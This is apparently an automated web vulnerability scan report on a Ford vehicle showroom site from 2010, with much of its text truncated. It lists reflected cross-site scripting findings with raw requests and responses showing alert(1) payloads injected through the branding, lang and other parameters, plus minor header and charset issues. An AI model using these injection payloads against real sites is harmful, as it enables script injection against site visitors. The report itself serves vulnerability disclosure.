1. Cross-site scripting (reflected)
1.1. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [branding parameter]
1.2. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [lang parameter]
1.3. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [makeTransition parameter]
1.5. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [referringSite parameter]
2. Cross-domain Referer leakage
4. Credit card numbers disclosed
5. HTML does not specify charset
5.1. http://www2.showroom.fordvehicles.com/FDShowroom/
5.2. http://www2.showroom.fordvehicles.com/FVShowroom/
5.3. http://www2.showroom.fordvehicles.com/fdpresentation/
6. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FDShowroom.jsp |
GET /FDShowroom.jsp?branding Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.fordvehicles Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Content-Type: text/html;charset=ISO Content-Language: en-US X-Pad: avoid browser bug Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:07:11 GMT Connection: close Content-Length: 115339 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>Ford Vehicle Showroom</title> <script type="text/javascript"> //<![CDATA[ ...[SNIP]... d = false; var clubWTKWidgets = true; var urlParamMap = { 'document_referrer' ,'branding':'11553c';alert(1)/ ,'makeTransition': ,'lang':'en' }; if(typeof urlParamMap.httpReferer != "undefined"){ urlParamMap.httpReferer = escape(urlParamMap } if(typeof urlParamMap.referrerURL != ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FDShowroom.jsp |
GET /FDShowroom.jsp?branding Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.fordvehicles Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Content-Type: text/html;charset=ISO Content-Language: en-US X-Pad: avoid browser bug Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:07:11 GMT Connection: close Content-Length: 115339 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>Ford Vehicle Showroom</title> <script type="text/javascript"> //<![CDATA[ ...[SNIP]... r urlParamMap = { 'document_referrer' ,'branding':'1' ,'makeTransition': ,'lang':'en65601';alert(1)/ }; if(typeof urlParamMap.httpReferer != "undefined"){ urlParamMap.httpReferer = escape(urlParamMap } if(typeof urlParamMap.referrerURL != "undefined"){ urlParamMap.referrerURL = e ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FDShowroom.jsp |
GET /FDShowroom.jsp?branding Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.fordvehicles Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Content-Type: text/html;charset=ISO Content-Language: en-US X-Pad: avoid browser bug Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:07:12 GMT Connection: close Content-Length: 115367 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>Ford Vehicle Showroom</title> <script type="text/javascript"> //<![CDATA[ ...[SNIP]... efined, wtk will NOT load implicitly on DOMReady var pageRefreshed = false; var clubWTKWidgets = true; var urlParamMap = { 'document_referrer' ,'branding':'1' ,'makeTransition': ,'lang':'en' }; if(typeof urlParamMap.httpReferer != "undefined"){ urlPa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FDShowroom.jsp |
GET /FDShowroom.jsp?5ab00'%3balert(1)/ Host: www2.showroom.fordve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ev22_getval=%60; FPI=model=Mustang&make |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Content-Type: text/html;charset=ISO Content-Language: en-US X-Pad: avoid browser bug Date: Sat, 20 Nov 2010 03:07:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 115228 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>Ford Vehicle Showroom</title> <script type="text/javascript"> //<![CDATA[ ...[SNIP]... r is defined, wtk will NOT load implicitly on DOMReady var pageRefreshed = false; var clubWTKWidgets = true; var urlParamMap = { 'document_referrer' }; if(typeof urlParamMap.httpReferer != "undefined"){ urlParamMap.httpReferer = escape(urlParamMap } if(typeof urlParamMap.referrerURL != "undefined"){ urlParamMap.referrerURL ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FDShowroom.jsp |
GET /FDShowroom.jsp?branding Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.fordvehicles Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Content-Type: text/html;charset=ISO Content-Language: en-US X-Pad: avoid browser bug Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:07:11 GMT Connection: close Content-Length: 115339 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>Ford Vehicle Showroom</title> <script type="text/javascript"> //<![CDATA[ ...[SNIP]... var pageRefreshed = false; var clubWTKWidgets = true; var urlParamMap = { 'document_referrer' ,'branding':'1' ,'makeTransition': ,'lang':'en' }; if(typeof urlParamMap.httpReferer != "undefined"){ urlParamMap.httpReferer = escape(urlParamMap } if(typeof urlParamMa ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FDShowroom.jsp |
GET /FDShowroom.jsp?branding Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.fordvehicles Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Content-Type: text/html;charset=ISO Content-Language: en-US X-Pad: avoid browser bug Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:46 GMT Connection: close Content-Length: 115311 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <title>Ford Vehicle Showroom</title> <script type="text/javascript"> //<![CDATA[ ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.flmowner ...[SNIP]... <li><a mporgnav href="http://www ...[SNIP]... <div class="lower"><a class="spritesV arrowLink" href="http://www.fordcpo ...[SNIP]... <div class="lower"><a class="spritesV arrowLink" href="http://www.fordcpo ...[SNIP]... <div class="lower"><a class="spritesV arrowLink" href="http://www.fordcpo ...[SNIP]... <div class="lower"><a class="spritesV arrowLink" href="http://www.fordcpo ...[SNIP]... <div class="lower"> <a class="spritesV arrowLink" href="http://www ...[SNIP]... <div class="lower"><a class="spritesV arrowLink" href="http://www.fordcpo ...[SNIP]... <div class="lower"><a class="spritesV arrowLink" href="http://www.fordcpo ...[SNIP]... <span class="more-technologies" To learn more about other advanced technology features you'll find in Ford vehicles, visit <a class="more-technologies ...[SNIP]... <div class="front"> <a href="https://www <div class="plac apply-credit"> ...[SNIP]... <div class="front"> <a href="http://www <div class="plac trade-in"> ...[SNIP]... </div> <a href="http://www.ford.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /combined.js.h1081660486 |
GET /combined.js.h1081660486 Accept: */* Referer: http://www2.showroom Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Cache-Control: private Expires: Mon, 16 Nov 2020 10:09:18 GMT ETag: pack1081660486 X-Powered-By: pack:tag Content-Type: text/javascript;charset Content-Language: en-US Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:50 GMT Connection: close Content-Length: 333889 var log4javascript;(function( ...[SNIP]... <matt@mattkruse.com> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /services/products/Models |
GET /services/products/Models Accept: */* Accept-Language: en-us Referer: http://www2.showroom x-requested-with: XMLHttpRequest Content-Type: application/x-www-form Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Access-Control-Allow Access-Control-Max-Age: 86400 Content-Type: application/json; charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:47 GMT Connection: close Content-Length: 219300 {"Response":{"status":"OK ...[SNIP]... m_BrandSitesVehicleName"} ...[SNIP]... ribute":[{"Value":"http:/ ...[SNIP]... 3800CCA.JPG","name": ...[SNIP]... ribute":[{"Value":"http:/ ...[SNIP]... 475C4916475C.JPG","name": ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FDShowroom/ |
GET /FDShowroom/ HTTP/1.1 Host: www2.showroom.fordve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ev22_getval=%60; FPI=model=Mustang&make |
HTTP/1.1 404 Not Found Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 $WSEP: Last-Modified: Fri, 22 Oct 2010 08:35:46 GMT Content-Length: 642 Content-Type: text/html Content-Language: en-US Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:53 GMT Connection: close <html> <head> <title>Application Not Available</title> <LINK HREF="/ErrorPages/404.css </head> <body> <center> <table> <tr> <th> <img src="/images/err-i ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /FVShowroom/ |
GET /FVShowroom/ HTTP/1.1 Host: www2.showroom.fordve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ev22_getval=%60; FPI=model=Mustang&make |
HTTP/1.1 404 Not Found Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 $WSEP: Last-Modified: Fri, 22 Oct 2010 08:35:46 GMT Content-Length: 642 Content-Type: text/html Content-Language: en-US Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:56 GMT Connection: close <html> <head> <title>Application Not Available</title> <LINK HREF="/ErrorPages/404.css </head> <body> <center> <table> <tr> <th> <img src="/images/err-i ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /fdpresentation/ |
GET /fdpresentation/ HTTP/1.1 Host: www2.showroom.fordve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ev22_getval=%60; FPI=model=Mustang&make |
HTTP/1.1 404 Not Found Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 $WSEP: Last-Modified: Fri, 22 Oct 2010 08:35:46 GMT Content-Length: 642 Content-Type: text/html Content-Language: en-US Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:51 GMT Connection: close <html> <head> <title>Application Not Available</title> <LINK HREF="/ErrorPages/404.css </head> <body> <center> <table> <tr> <th> <img src="/images/err-i ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.showroom |
Path: | /static/com/forddirect |
GET /static/com/forddirect Accept: */* Accept-Language: en-us Referer: http://www2.showroom x-requested-with: XMLHttpRequest Content-Type: application/x-www-form Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www2.showroom.fordve Proxy-Connection: Keep-Alive Cookie: userInfo=country_code=US |
HTTP/1.1 200 OK Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 Last-Modified: Fri, 22 Oct 2010 08:37:48 GMT Content-Type: text/html Content-Language: en-US Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:49 GMT Connection: close Content-Length: 317 <div id="border"> <div id="left-border"></div> <div id="right-border"></div> </div> <div id="page-bottom-base"> <div id="border-left-corner">< <div id="border-bottom"></div> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www2.showroom |
Path: | /localization/ |
GET /localization/ HTTP/1.1 Host: www2.showroom.fordve Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ev22_getval=%60; FPI=model=Mustang&make |
HTTP/1.1 500 Internal Server Error Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47 $WSEP: Content-Length: 12 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Sat, 20 Nov 2010 03:06:53 GMT Connection: close Error 500: |